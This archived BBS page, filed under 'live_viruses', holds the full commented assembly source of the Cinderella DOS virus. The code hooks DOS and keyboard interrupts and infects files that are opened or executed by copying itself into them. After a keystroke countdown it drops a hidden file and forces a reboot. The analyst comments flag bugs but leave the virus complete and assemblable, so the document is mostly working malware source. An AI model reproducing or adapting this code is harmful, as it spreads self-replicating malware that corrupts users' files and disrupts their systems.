home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
cinder.asm
< prev
next >
Wrap
Assembly Source File
|
1991-09-03
|
10KB
|
345 lines
page ,132
;
; NOTE: This virus expects to run in the 2nd half of the interrupt
; vectors. Therefore, it is loaded and disassembled from
; offset 0200h.
;
; name: cinder.vom
;
; program type: com/bin
;
; cpu type: 8086/8087
;
; program loaded at 0000:0200
;
; physical eof at 0000:0acd
;
; program entry point at 0000:0200
;
fun segment
assume cs:fun,ds:fun,es:fun,ss:fun
;
; references before the start of code space
;
org 0000h
h_0000 label word
org 013bh
h_013b label word
;
; data references to code space addresses
;
; org 0360h
;h_0360 label word
;
; start of program
;
org 0200h
h_0200:
mov ah,0fbh ;fn = virus ID
int 21h ;call DOS
or ah,ah ;virus ID return?
jz h_0231 ;yes, skip this
xor ax,ax ;get a 0
push ax ;copy INT seg
pop es ;to es
mov si,0100h ;ds:si = this virus
mov di,0200h ;es:di = 2nd half of INTs
mov cx,offset h_0386-h_0200 shr 1 ;virus size in words (00c3h)
repz movsw ;copy virus to low mem
push es ;INT seg
pop ds ;to es
mov di,offset h_0386 ;di = oldint21ofs
mov si,0084h ;si = INT 21 vector
mov bx,offset h_024d ;ofs of INT21HERE
call h_0345 ;call get_set_int
mov di,offset h_038e ;di = oldint16ofs
mov si,0058h ;si = INT 16 vector
mov bx,offset h_0357 ;ofs of INT16HERE
call h_0345 ;call get_set_int
h_0231:
push cs ;current segment
pop ds ;to ds
mov si,[h_023b-0100h] ;get infected_program_size(013bh)
;NOTE: At end of "normal" program is the
; replaced start of the infected program.
mov ah,0fch ;fn = virus execute
int 21h ;dos call
;
h_023b dw 0847h ;infected_program_size
;
; filename to be created
;
h_023d db "cInDeReL.la"
; db 63h,49h,6eh,44h,65h,52h,65h,4ch ;023d
; db 2eh,6ch,61h ;0245
db 0ffh,00h ;0248 ..
;
; int24here
;
h_024a:
xor al,al ;response = IGNORE
iret ;and done
;
; int21here
;
h_024d:
pushf ;save flags
cmp ah,0fbh ;fn = virus ID?
jnz h_0257 ;no, skip this
xor ah,ah ;set virus ID return
popf ;restore flags
iret ;and done
h_0257:
cmp ah,0fch ;fn = virus execute?
jnz h_026a ;no, skip this
popf ;save flags
push ds ;program seg
pop es ;to es
pop di ;get return IP
mov di,0100h ;normal COM start
push di ;to stack
mov cx,offset h_0386-h_0200 shr 1 ;cx = size of virus (00c3h)
repz movsw ;replace program code
iret ;and done
h_026a:
cmp ax,3d00h ;fn = open for read-only?
jz h_0274 ;yes, stop here
cmp ah,4bh ;fn = load/execute?
jnz h_0297 ;no, continue
h_0274:
push ax ;save regs
push bx
push cx
push dx
push es
push ds
push si
push di
push dx ;filename ofs
pop di ;to ds
push ds ;filename seg
pop es ;to es
mov al,2eh ;a period ('.')
h_0282:
scasb ;look for period
loopnz h_0282 ;not found, try again
;BUG: CX is NOT set!
mov ax,[di] ;get start of extension
or ax,2020h ;force lower case
cmp ax,6f63h ;is it 'co'? (start of COM)
;BUG: Extension is NOT relevant!
jz h_029d ;yes, keep infecting
h_028f:
pop di ;restore all regs
pop si
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
h_0297:
popf ;restore flags
jmp dword ptr cs:[h_0386] ;and continue INT 21
h_029d:
push ds ;save filename seg
push cs ;current seg
pop ds ;to ds
mov di,offset h_038a ;di = oldint24ofs
mov si,0090h ;si = INT 24 vector
mov bx,offset h_024a ;ofs of INT24HERE
call h_0345 ;call get_set_int
mov si,0360h ;si = ptr to keyboard_count
add word ptr [si],029ah ;update keybaord_count
;by 666 (decimal)
pop ds ;restore filename seg
mov ax,4300h ;fn = get file attributes
int 21h ;call DOS
jnae h_0331 ;error, quit
push ds ;save filename ofs
push cx ;and attributes
push dx ;and filename seg
and cl,0feh ;turn off read-only bit
mov ax,4301h ;fn = set file attributes
int 21h ;call DOS
jnae h_0329 ;error, quit
mov ah,48h ;fn = allocate memory
mov bx,offset h_0386-h_0200+0fh shr 4 ;virus size (paras) (0019h)
int 21h ;call DOS
jnae h_0329 ;error, quit
push ax ;save allocated seg
push ax ;copy allocated seg
pop es ;to es
mov ax,3d02h ;fn = open file for read/write
int 21h ;call DOS
pop ds ;allocated seg to ds
xchg ax,bx ;handle to bx
mov ah,3fh ;fn = read file
mov cx,offset h_0386-h_0200 ;virus size (0186h)
xor dx,dx ;ds:dx = allocated memory
int 21h ;call DOS
cmp ax,offset h_0386-h_0200 ;all bytes read? (0186h)
jnz h_0321 ;no, quit!
mov ax,[0000h] ;get start of just-read program
cmp ax,0fbb4h ;our signature?
jz h_0321 ;yes, skip this
push cx ;save bytes read
mov ax,4202h ;fn = lseek to EOF+CX:DX
xor cx,cx ;cx:dx = 0
int 21h ;call DOS
add ah,01h ;fn = write
mov cs:[h_023b],ax ;set infected_program_size
mov ah,40h ;fn = write (AGAIN!)
pop cx ;restore size
int 21h ;call DOS
jnae h_0321 ;error, quit
push cx ;save size
mov ax,4200h ;fn = lseek to BOF+CX:DX
xor cx,cx ;cx:dx = 0
int 21h ;call DOS
mov ah,40h ;fn = write to file
pop cx ;restore size
mov dh,02h ;dx = 0200h = this virus
push cs ;current segment
pop ds ;to ds
int 21h ;call DOS
mov ax,5700h ;fn = get file time/date
int 21h ;call DOS
inc al ;fn = set file time/date
int 21h ;call DOS
h_0321:
mov ah,3eh ;fn = close file
int 21h ;call DOS
mov ah,49h ;fn = free allocated memory
int 21h ;call DOS
h_0329:
mov ax,4301h ;fn = set file attributes
pop dx ;get filename ofs back
pop cx ;and attributes
pop ds ;and filename seg
int 21h ;call DOS
h_0331:
cli ;do not disturb
push cs ;current segment (0)
pop ds ;to ds
mov si,offset h_038a ;si = oldint24ofs
mov di,0090h ;di = INT 24 vector
lodsw ;get old INT 24 ofs
mov [di],ax ;replace it
lodsw ;get old INT 24 seg
mov [di+02h],ax ;replace it
sti ;ints are OK again
jmp h_028f ;cleanup stack and exit
;
; get_set_int
;
h_0345:
lodsw ;get INT ofs
mov [di],ax ;save for later
lodsw ;get INT seg
mov [di+02h],ax ;save for later
sub si,+04h ;backup to the INT again
cli ;do not disturb
mov [si],bx ;set new INT ofs
mov [si+02h],ds ;and new INT seg
sti ;ints are OK again
ret ;and done
;
; int16here
;
h_0357:
pushf ;save flags
or ah,ah ;fn = get character?
jnz h_0380 ;no, we're done
push ds ;save ds
push cs ;current segment
pop ds ;to ds
h_0360 equ $+1 ;keyboard_count
mov ax,82b2h ;get keyboard_count
or ax,ax ;is it 0?
jnz h_0379 ;no, skip this
mov ah,3ch ;fn = create file
mov cl,07h ;attribs = HIDDEN, SYSTEM, R/O
mov dx,offset h_023d ;ds:dx = cinderella_name
int 21h ;call DOS
xchg ax,bx ;handle to bx
mov ah,3eh ;fn = close file
int 21h ;call DOS
jmp 0f000h:0e05bh ;goto test CPU (reboot?)
h_0379:
dec word ptr [h_0360] ;udpate keyboard_count
xor ax,ax ;reset fn
pop ds ;restore ds
h_0380:
popf ;get flags back
jmp dword ptr cs:[h_038e] ;continue INT 16
;
; end of virus itself. Data space/infected program follows
h_0386 dw 5858h ;oldint21ofs
dw 5858h ;0386 XXXX
h_038a db 58h,58h,58h,58h ;oldint24ofs
h_038e db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ;oldint16ofs
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXX"
dw 03bah,0b401h,0cd09h,0cd21h ;093e ......!.
dw 0e920h,073bh,6854h,7369h ;0946 .;.This
db " is a tiny COM program, padded t"
db "o be larger."
db 0dh,0ah ;097a
db "$XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
db "XXXXXXXXXXXXXXXXX"
fun ends
end h_0200